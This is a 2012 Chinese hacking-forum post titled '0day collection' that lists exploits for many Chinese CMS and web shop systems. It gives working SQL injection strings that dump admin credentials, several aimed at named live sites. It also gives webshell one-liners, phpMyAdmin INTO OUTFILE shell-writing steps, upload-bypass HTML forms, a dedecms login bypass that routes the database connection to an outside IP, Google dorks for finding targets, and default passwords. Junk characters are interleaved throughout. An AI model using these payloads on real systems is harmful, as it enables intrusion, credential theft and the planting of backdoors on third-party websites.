中国网络渗透测试联盟

标题: 0day合集 [打印本页]

作者: admin    时间: 2012-9-13 16:58
标题: 0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
$ j1 N* l" y4 F8 ^
9 g0 W/ j$ r1 r* C7 z' d直接上exploit:' Q+ Q0 U& i) S4 `
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));/ C4 I* r8 i8 R( _
test:http://www.tb11.net/system/xitong/shownews.asp?id=210( n  N9 o) k0 E  o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# X0 B1 O6 S0 p" h- r9 R+ |
Asprain论坛 注册用户 上传图片就可拿到webshell# x6 e3 \/ i, B/ k% r) @

. x# v) y8 J9 ZAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。- {8 z( O$ W: e' Y: a9 I! {; T
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>0 t; X4 z" t2 b3 x
2.gif 为一小图片文件,一定要小,比如qq表情图片, }+ K4 \8 B4 y6 y0 ^# A, s. V
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
5 k" ~. {0 A2 I: N* ]4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
% H  }5 T4 |" V, q5.q.asp;.gif2 n. G7 F8 M4 |. o4 K
google:Powered by Asprain
( F2 Y2 T; \3 T1 F/ D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 Y! U; C% D! ~) w
% u/ N; S- s& u6 P4 \3 |. I; N
ShopNum1全部系统存在上传漏洞。
* ?  e) B. Y! h. o
6 u* i2 N1 \# m首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。, d0 Z. K* _, J, [
按说明 提示登录后台。。8 h' G. b8 G8 _! c. V% x
在后台功能页面->附件管理->附件列表
4 E4 O( q3 X4 O. ^可以直接上传.aspx 后缀木马
" B  A* K( s% c8 {" C; Z. ^http://demo.shopnum1.com/upload/20110720083822500.aspx( I5 ?/ U6 v8 N! G) I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------  e; l5 A, x, R, o; Z% d
. `7 i) v' V8 m. d# s* A$ {
牛牛CMS中小企业网站管理系统 上传漏洞2 O9 \$ r- P0 v! l8 A

) ~7 E- K- N) O3 x! w4 T& m牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。% n) t8 t% Q9 F* U7 f" c& K, g; ^
后台:admin/login.asp
4 L4 t) _" P, y1 G9 S1 q+ M* Gewebeditor 5.5 Nday/ i6 M! k! Y, p' d, V! a+ v8 r
exp:
/ l) s% i# a3 K<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?3 e# |9 Y/ t* f3 ^- d
<input?type=file?name=uploadfile?size=100><br><br>?
1 H- g1 G# C; \' v2 f1 @9 ^<input?type=submit?value=upload>?/ U. M! S/ f$ m. _
</form>
8 n" p( E7 M3 h& Yps:先上传小马.% R# [) X( y( o7 C* Y5 S
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏8 H8 _/ Y8 j. }. {

# c; ~$ F3 }1 @( ?7 a) }9 t--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% G  x0 X7 d+ p6 n; @: l& W8 o4 I) Y: n3 f, ?& ]2 x+ A
YothCMS 遍历目录漏洞
( y9 @) q, Y' x/ t3 A
) `7 Y" }" x, z, l* _优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。2 b; M7 o1 Z! D& i# r2 K  {
默认后台:admin/login.asp
4 R, x8 t' Z, M1 W( d) i; J遍历目录:, l3 Y3 z8 F1 @) q( ?6 D) H
ewebeditor/manage/upload.asp?id=1&dir=../7 f6 @, P' w, g3 I1 ]
data:6 e' i/ w9 E% }2 l5 U" F7 ]
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa' H8 g0 F; g2 w! _
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" ~) u' m5 D, v! n$ m. p  @1 ?
% }* F( w& L  i6 R. Q! k6 w7 ANet112企业建站系统 1.09 K$ C& x5 C; y# O5 @0 V

4 D8 u, e; l$ t5 ^% S, y源码简介:
5 l' y( U! x5 H2 B0 PNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
# }5 \+ s7 Q2 p添加管理员:
) Z# }$ \7 h+ @" q1 @' B: lhttp://www.0855.tv/admin/admin.asp?action=add&level=2
4 V& c: y$ ]) N. [$ R& ~其实加不加都不是很重要,后台文件都没怎么作验证。* W% Y7 n7 R6 {1 b% w) f' f4 H+ R' U
上传路径:: `) S! [/ y2 S" D
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2002 {4 e, G2 [) x. A6 }# w
http://www.0855.tv/inc/Upfile.asp?Stype=28 O% @# j# w7 @
怎么利用自己研究。; x& z6 E+ H) s
遍历目录:
; g+ P5 V) l6 ^http://www.0855.tv/admin/upfile.asp?path=../..
- h, e' R) }& d  D# `+ r如:
4 o1 k- E! [; Q1 x. xhttp://www.0855.tv/admin/upfile.asp?path=../admin
" o) ]' M' O) E  x' y+ B& E: Ihttp://www.0855.tv/admin/upfile.asp?path=../data
9 u' y$ z8 \- s--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; s$ o( K3 t' p/ D& @: p1 B
# m" j4 g$ ?) f$ A1 Y7 U7 J, E
易和阳光购物商城通杀 上传漏洞
8 t1 i+ F( X; @5 P4 B# f5 `( F% b3 G5 }/ |& ~5 P* ~4 B" a- K' b
前提要求是IIS6.0+asp坏境。% t: `+ D# y5 ^; }: l2 p& F' ?" D
漏洞文件Iheeo_upfile.asp & l" `6 k2 e) y/ H( Q
过滤不严.直接可以iis6.0上传- [) N$ w9 X( c
把ASP木马改成0855.asp;1.gif
; U' Q! Q8 D; G  E直接放到明小子上传
& h) o- @& n* {+ }4 N7 s9 ~. MGoogle搜索:inurl:product.asp?Iheeoid=) ~1 Z! g( T/ j4 Y$ D$ k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ j5 S2 w# e8 F, p0 r+ f

$ K1 a: a# j  W( f8 qphpmyadmin后台4种拿shell方法8 c" V2 e& F% q+ e
9 c+ s6 Q; Y; Y$ l- F: B3 F
方法一:
  k+ y6 ]4 O! d: XCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
- x1 O: [0 A* L. ~  R6 h* y( {# IINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');4 A7 i/ h* c' Z3 E+ ?7 {: L. {
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';% {& N5 i# r  d/ z; \1 G
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
0 e7 I  S' k1 @4 E3 ~8 u: d一句话连接密码:xiaoma
0 D: _2 O+ g3 @/ N方法二:
) e6 g& Y8 t' J6 P& WCreate TABLE xiaoma (xiaoma1 text NOT NULL);1 O& m( ]) b& O. _) m4 Z
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');  I; C7 M2 b# a, v
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
2 c  Z1 ~; {0 ^! ODrop TABLE IF EXISTS xiaoma;
: ^3 O2 v* f0 X. t& g方法三:
! _( J' _# w4 Y8 \1 ^读取文件内容:    select load_file('E:/xamp/www/s.php');% |8 g1 v7 q$ o2 w
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
- ~1 A% D8 [$ C% a8 k  F7 ]cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'% n# Y& ?* c1 c+ J
方法四:
1 K% ?1 h/ q# U5 j- [select load_file('E:/xamp/www/xiaoma.php');
$ v# A& P2 x5 q- hselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
0 x# Z* o" }0 q" f: `然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
$ m% U/ {" w/ U. A* c! R3 ~3 P--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ G- t1 y" {# E: l3 ^4 j- t4 I+ e' P2 l9 Z
传信网络独立开发网站源码0day漏洞9 ]! t9 m9 _) Z/ u
7 S, n; x( ^/ w5 t$ F
后台system/login.asp& r( Z; ^4 B2 e. e* G$ u
进了后台有个ewebeditor! |; r7 H' k* ^8 j$ C
Google 搜索inurl:product1.asp?tyc=
6 h8 h! ?% w: R. B编辑器漏洞默认后台ubbcode/admin_login.asp
! k4 ~2 e1 U/ \8 A7 B7 z数据库ubbcode/db/ewebeditor.mdb/ @1 t6 S: k/ R4 N
默认账号密码yzm 1111111 k3 B: |7 U: N- M
7 G4 }5 T- N. z+ ^; d% s9 v* U0 i: X
拿webshell方法
- R% U! i! L* }/ ~  Q( H* q登陆后台点击“样式管理”-选择新增样式
7 p6 u% ?" ?7 A* `  h1 V% a4 l样式名称:scriptkiddies 随便写 4 |5 y7 q3 o. K) `" }! r- W
路径模式:选择绝对路径
- {( J5 r" q# W% N6 p图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx/ l- b8 k# }6 P: y  X
图片类型比如就是我们要上传的ASP木马格式
6 E/ `+ u: T4 E2 e) A. l上传路径:/
! I/ {1 ^$ `! C. \1 `" w3 y图片限制:写上1000 免的上不了我们的asp木马0 j- B1 R: D# h; {1 d
上传内容不要写$ i# }% z5 p% K9 H$ W
可以提交了
) ]. y2 T/ F0 J5 i9 p8 g2 I) ^样式增加成功! / a& a- A- P9 \4 j" w/ b& I- Z
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 3 J: g; J7 ?3 J: F% ~' H
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
+ K7 m/ |$ P+ h, E7 K网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies8 {: l, k7 D2 l
上ASP木马 回车 等到路径
7 v' s3 [- y0 I5 |: F/ ?9 [) l5 ]; l( {* I3 P2 ^+ ^
后台:system/login.asp: X5 j: z: Y$ p
Exp:+ c' t. o0 |* O' Z
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master3 N- f9 W" f) W2 o% r
测试:
6 q5 b% A5 U- A- w( Thttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
: `* O) g9 q7 d4 k9 [( [/ U9 Thttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
/ I# u* V/ u9 p6 i7 ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 ^: i; ]) ]" a& h/ a* [  r  }4 Y- A, A- u2 L
foosun 0day 最新注入漏洞; d+ u% |1 U! I
5 E$ T9 W/ a( D6 X
漏洞文件:www.xxx.com/user/SetNextOptions.asp
& j) z3 J+ ?5 `' H0 Q8 o* a/ o利用简单的方法:
& X0 a  D  j1 g4 j, s暴管理员帐号:7 L" i7 w2 H! A) H
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
' m: E( l! u5 x1 l暴管理员密码:
1 \' D! p2 Z* S: b! X0 qhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
+ n" P. _! Z0 x9 l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 }0 ]* _( Z# I$ k
3 Q8 U, E# K6 R网站程序的版权未知!
2 B$ r& }! @8 M5 ?& H7 ^# |* H7 m& F! L# V/ j; O
默认网站数据库:  A1 _# n8 V+ K% u. U
www.i0day.com/data/nxnews.mdb
% W, H# x6 a/ C! wewebeditor 在线编辑器:  C1 U8 T+ a: @. A4 g" x" s
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb. m' U+ j1 |; r8 P( {/ A3 r& l
登录地址:ewebeditor/admin_login.asp) _2 v* Y6 E0 s' p+ Z1 s
默认密码:admin  admin
2 F! c" `0 `7 ]: D$ N3 ^8 X# x0 N: |登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
' @5 c. L2 g$ T' V* c' D4 U% n6 z; g; `) x( K; n8 a! Q! o- |
Sql注入漏洞:+ t; A( P0 a0 \+ j0 J* j
http://www.i0day.com/detail.asp?id=12. y/ m' t/ F5 c8 Z  H3 O
exp:
6 g& G+ W/ J5 q- e, M; ?% ]( ^union select 1,admin,password,4,5,6,7,8 from admin
* b" I* ^/ t( K6 b爆出明文帐号/密码. n, H" K' l, t7 a' Z

0 d! i% W# a4 s/ s& h4 Z: i5 v6 |上传漏洞:& `+ y1 \" n9 @& @$ F. {. J3 q
后台+upfile.asp6 g9 ^. G. {3 \9 E+ ?. M5 o
如:
  c7 J" e6 U5 C/ s; ]4 @0 M; G9 [: Chttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
  Q3 n6 C2 b0 t+ g! q4 dshell的地址:网址+后台+成功上传的马0 ~  Y( ?( K5 E% e4 z& m+ Y3 f
google:inurl:news.asp?lanmuName=# E4 {1 v: p* O) h' C' j
------------------------------------------------------------------------------------------------------------------------------------------------------------------------( a8 v1 ?& k6 h' k

8 l/ b/ T  r3 i9 P4 t1 B! D1 pdedecms最新0day利用不进后台直接拿WEBSHELL2 t1 t# G) ~+ ?$ y1 `

' \- F' @% w* v5 e# B' l拿webshell的方法如下:' n) \9 k! S+ p4 Q/ J% O/ N# s6 C
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
: F' b1 q  ^% f$ Z前题条件,必须准备好自己的dede数据库,然后插入数据:
1 S% f8 l' ]) O% vinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
9 ~5 S$ x' U4 H% I1 y+ U  p) P; Q5 Q7 K# ?  x0 x  J
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
2 q& n0 g% N3 p4 f2 {5 `<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">0 y# s3 K/ I6 `+ e# K
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />- E, B; b6 Q: b* ~. m  f. \; G% x3 i
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
  v, A- l$ }+ x% `, R+ w<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
, {. I7 f) a+ i% ^5 O9 \1 S! T<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
# F! b/ l9 t! E* \) T<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
; V! z; D0 r) y% P<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />; X% `" ]; ^. m4 T3 ~) x7 Y1 T3 k
<input type="text" value="true" name="nocache" style="width:400">
! v, ~1 N0 k* G+ w& `6 @5 z  F/ D<input type="submit" value="提交" name="QuickSearchBtn"><br />
* b& u  O" @1 t8 s</form>
  w9 Y4 S( P% P<script>
4 w- f: F/ w- Y9 W5 F" gfunction addaction()
% F' H1 Q# e$ T1 z6 W{) n) a# m& v& P' a% O, A: ?% j, \6 S
document.QuickSearch.action=document.QuickSearch.doaction.value;
/ i& N# n/ S, {}/ T: ]0 G  h; s# b6 X
</script>4 }; f! A; j% K' R4 g# b3 M
-----------------------------------------------------------------------------------------------------------------------------------------------, X( q  G& s( W7 |
9 C/ s8 F0 Y: j* \  m
dedecms织梦暴最新严重0day漏洞- ]! J) k3 P$ b  K% N
bug被利用步骤如下:
9 h! R' Q! Q1 G' L/ Y* |3 o6 Ghttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
0 {5 w8 i8 p9 k! Q把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
5 C7 D, J. r* F$ M* g; {, N-------------------------------------------------------------------------------------------------------------------------------------------$ c/ D, M# N0 K# N

9 @8 U! C* }0 Y8 E) N* o5 E( B, u多多淘宝客程序上传漏洞
  p2 h+ z/ u; N: ]) f5 A0 [. n- d漏洞页面:  q! h% Y# s% t( u9 s1 k
admin\upload_pic.php
' F' E, N3 h( ~传送门:
1 V9 P$ c0 K# T; v: l: z* Ohttp://www.www.com/admin/upload_pic.php?uploadtext=slide1& Y: N; U) i! H( n5 U8 L( P
PS:copy张图片马 直接  xxx.php 上传抓包地址!& o6 W, Z* J5 Q7 i5 D  ^5 Y9 b
------------------------------------------------------------------------------------------------------------------------------------------------------# [+ z8 `" F* o  I+ J
. l3 y% L: G6 P% X+ w) U
无忧公司系统ASP专业版后台上传漏洞1 F; b. n: F. ~
漏洞文件 后台上传' H+ O. c/ I+ k5 Q
admin/uploadPic.asp0 |6 d" J( J8 z) D% V& r9 U
漏洞利用 这个漏洞好像是雷池的$ {. Q0 K5 F3 o9 t. R$ K4 N
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
7 U" K/ M& R" c6 \等到的webshell路径:
- H; G4 Y. v3 F& [$ ~2 N/UploadFiles/scriptkiddies.asp;_2.gif! r+ p; m1 S! C% X1 Z* j: y7 y8 N
---------------------------------------------------------------------------------------------------------------------------------------------------9 j' L4 v; R1 {8 s9 g4 ?& j5 y
0 u& P! G0 f+ G' |* T! Y. V
住哪酒店分销联盟系统2010$ k0 Z$ {& G8 r2 P' T6 V
Search:4 g9 C6 y: x1 y& P
inurl:index.php?m=hotelinfo
4 l  U6 ^" {9 l; I: j. h- r* \http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin2 B; \( t; v/ M& L; o/ N3 R
默认后台:index.php?m=admin/login
" Q# ]* H$ C+ `$ h7 K--------------------------------------------------------------------------------------------------------------------------------------------------& |; J1 R0 D* D( |6 A. I- g
, E; L) A0 n6 B# g0 S3 f
inurl:info_Print.asp?ArticleID=! N0 c# N3 @  e# G
后台 ad_login.asp
) y7 p% I% T' ]& R* ]爆管理员密码:
' s$ @: Q, q7 |) N4 c$ J  Ounion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
) e- b) L4 b4 B  t------------------------------------------------------------------------------------------------------------------------------------------------------------
# U# X% B. c3 S; C$ b* p- Y* o/ C2 ~, \& V/ d
搜索框漏洞!
( c' c6 G4 v. U8 \0 @* _%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
1 s# S, D( e# T6 C8 I--------------------------------------------------------------------------------------------------------------------------------------------------------
+ q  A  [& {! H. K! t+ X2 ?& S) b( H8 n
关键字:) A4 ^5 ?( I) u* V& U8 b
inurl:/reg_TemletSel.asp?step=2
" O) B% ~* Y& X# b3 S& Z1 D5 t或者5 h# T( H$ E5 Q7 d/ Z2 T/ x; \
电子商务自助建站--您理想的助手/ \9 g: o& D* v6 J3 }5 ?' V
-------------------------------------------------------------------------------------------------------------------------------------------------) b0 j, t+ l: E+ x4 S  t& D

  Y& B1 A8 p) E* U) J: ~; a/ k; [iGiveTest 2.1.0注入漏洞7 j0 V( m; L+ N2 q* J; I
Version: <= 2.1.0
% @9 w2 D6 X8 N7 L' E9 j9 A# Homepage: http://iGiveTest.com/
) \1 Y4 h( `9 A  n( m: }谷歌关键字: “Powered by iGiveTest”
& ~3 w" Q" q! u+ u/ U( F# q8 U$ W% A随便注册一个帐号。然后暴管理员帐号和密码
+ d& L7 n8 f  n" f) Y3 R: Ehttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
4 F7 d2 a3 i. s------------------------------------------------------------------------------------------------------------------------------------------------
2 p5 e( B" g9 v% W/ x. r6 Q+ L( a: j% k5 ]# W' e
CKXP网上书店注入漏洞
* i4 W1 f% s! r, B" }工具加表:shop_admin 加字段:admin1 F4 ~) \; s& i, Q$ B/ K
后台:admin/login.asp 7 \) R5 j3 O2 U  d7 d$ A
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/2 S# `$ x, \" R, ^$ n( s
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息$ p# v$ g" v% h8 w7 ]9 \# g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 d1 r) @5 S8 I' [
0 N( u0 k) V) }) U6 q0 _
段富超个人网站系统留言本写马漏洞5 u7 G' N' n2 l* ?2 Z* X
源码下载:http://www.mycodes.net/24/2149.htm
5 ]/ Y; o. ?" l' Raddgbook.asp 提交一句话。) z; n; g# V. i! Z5 k- {
连接: http://www.xxxx.tv/date/date3f.asp
9 u) Z0 S4 r; F# W4 |1 ngoogle:为防批量,特略!' W1 e3 c& W* _  j
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" [' [* l" f* k* ]2 [5 m0 C
2 R' A9 l+ m! P# Q智有道专业旅游系统v1.0 注入及列目录漏洞
2 s. o8 B0 b8 [  A( E" ?默认后台路径:/admin/login.asp
( I6 K1 G* N% ]% s/ b- n默认管理员:admin
2 u- W( ?4 M' Z: y5 y  R  P2 G$ P默认密码:123456& q( c, L( T' q: r' j1 S! Q6 e
SQL EXP Tset:
! p0 Z) X) i8 m/ {, f* f' khttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
, g* K" O: [# {0 X% e. ]------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 O2 @5 N7 o6 |* K1 ^/ o
" s, ]! n) O+ P" R2 v+ Mewebeditor(PHP) Ver 3.8 本任意文件上传0day3 q0 d' L% t, T
EXP:/ K$ q- A% J9 |% N, T
<title>eWebeditoR3.8 for php任意文件上EXP</title>8 B# c& t( O8 l( a% Q" ^
<form action="" method=post enctype="multip
  t+ X7 k% H% @* C7 aart/form-data"> 2 C( Q: r1 }+ I. y7 Y8 [
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">   P& ?! x% _* L8 A
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
% k8 @/ @/ F, J<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
9 k3 w. ^6 Q& k( k2 Ofile:<input type=file name="uploadfile"><br>
: n+ {' i- s6 d9 X2 ]/ S$ a$ S<input type=button value=submit onclick=fsubmit()> ) X7 \, T* c/ }+ Y+ o
</form><br> 4 `, c6 G# ?5 m# d# y* O
<script>
! k- U, n5 }2 y0 Ufunction fsubmit(){
& S$ n7 d4 c1 @' V2 Vform = document.forms[0]; - k9 x- o3 p& w) H  P5 T# _+ Q
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; % ~6 m" ]& j. H2 @; P
alert(form.action); & e4 l+ \" F: l2 }- t9 q, ?3 i
form.submit();
: i, ~! I" H' J8 E1 b- y* @, v}
  b: r# o& d) M+ y/ m</script>* s3 G7 p  O4 c2 w
注意修改里面ewebeditor的名称还有路径。
% p, D1 _& a& _  o) H---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ {4 c* o4 Y/ S3 V' j' J
2 v) V% R8 B& D) F3 H+ v7 I) Z; p% R提交’时提示ip被记录 防注入系统的利用9 u' A9 L* f$ _' u6 ^& U; d& \: I7 m
网址:http://www.xxx.com/newslist.asp?id=122
4 F3 N% W9 @2 C8 t1 e! ~6 V0 E提示“你的操作已被记录!”等信息。, o- a. c6 V8 u. t# S( ]3 Q  X
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。3 b$ K0 |( t1 @& r/ r
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: J- T9 ~' z) m9 }
# X) U1 X# n# r
西部商务网站管理系统 批量拿shell-0day7 L$ ^+ `+ `' R
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
* a2 Z: j" Q, D) b2 @3 z/ e1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
( s2 v% K6 y2 b: `' v% D7 m- O" k2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
4 O+ k- S9 w2 Q8 Q3 i: p4 B3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂3 M8 M, s5 O4 U( O0 R2 O
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# i5 e+ ~/ d/ Z& _8 A) T# X9 x+ Y1 E/ P; ^* O! s& L! f" x
JspRun!6.0 论坛管理后台注入漏洞
: K" K+ @: n, @6 L6 k, e- W  m" Q. f- r8 t! y2 D
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
9 V: Q' ?/ O: Q7 ?. |7 CJspRun!6.0
7 t7 ?& t" |0 ~. ]; r, |$ H6 n漏洞描述:+ j/ c2 h0 i! k- J1 Y
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。) K* S% t" h' L! S2 U; ]* M- z
在处理后台提交的文件中ForumManageAction.java第1940行2 j) ^# O/ Z! a1 P% P  ^
String export = request.getParameter("export");//直接获取,没有安全过滤
# S# Q9 ?% }5 `- d1 L; x8 q. ], U+ Mif(export!=null){$ X# R9 [) _& C
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...1 d7 S* D4 b' B0 S
if(styles==null||styles.size()==0){: y' E1 c, K" h. [1 ^0 x* y( R1 D7 |
<*参考& D% [3 n" ?# Z4 e
nuanfan@gmail.com" }- f$ O! Y' P8 |0 l% V
*> SEBUG安全建议:
+ l5 s/ V) b4 n) Cwww.jsprun.net
. w+ [# U( C7 R6 E+ V/ W, i* A(1)安全过滤变量export
' L# y8 o2 {4 ?(2)在查询语句中使用占位符
, |4 D- M/ P$ H# \3 R------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 C' j) v  Y" o; ^+ }1 t9 o# q3 n) [* U
乌邦图企业网站系统 cookies 注入
6 G' J! Q: b8 [& S- k( T  t! J( R, H' H  r! T) b2 T, T
程序完整登陆后台:/admin/login.asp6 \, J. P* h8 ~0 e, W2 C  N
默认登陆帐号:admin 密码:admin888, ]8 M; x7 _$ H2 [  h2 u
语句:(前面加个空格)+ A2 f# f+ D, k# P" I
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
; B; W1 L5 \6 y$ s1 m) `8 ]4 M或者是16个字段:
1 p1 h% x$ j1 {1 L! j; _and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
: T; m% t" C2 O9 y4 f爆不出来自己猜字段。
/ a" x! K  P3 K) e注入点:http://www.untnt.com/shownews.asp?=88
3 w+ a: ?5 ^8 Z8 j( Vgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp% q4 p- p( X5 p" }  r
关键字:
9 W6 K7 d" W- r2 minurl:shownews?asp.id=
  P: z2 N$ s6 U+ `: W-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 l. g5 e# A! S/ ~& @$ i8 x

" |+ G$ x4 v0 k. m. \+ xCKXP网上书店注入漏洞# O$ @+ u5 y+ p# F. B. n

8 H9 j. y2 l1 u工具加表:shop_admin 加字段:admin
2 D2 \& `; N, H2 ^2 L0 e! `2 C后台:admin/login.asp
' ^2 r" X, U, \1 k8 g% r1 B6 T登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
6 x8 D: E2 S1 b2 ?3 h! P) g4 Uinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息& }! }& A/ K1 [  k
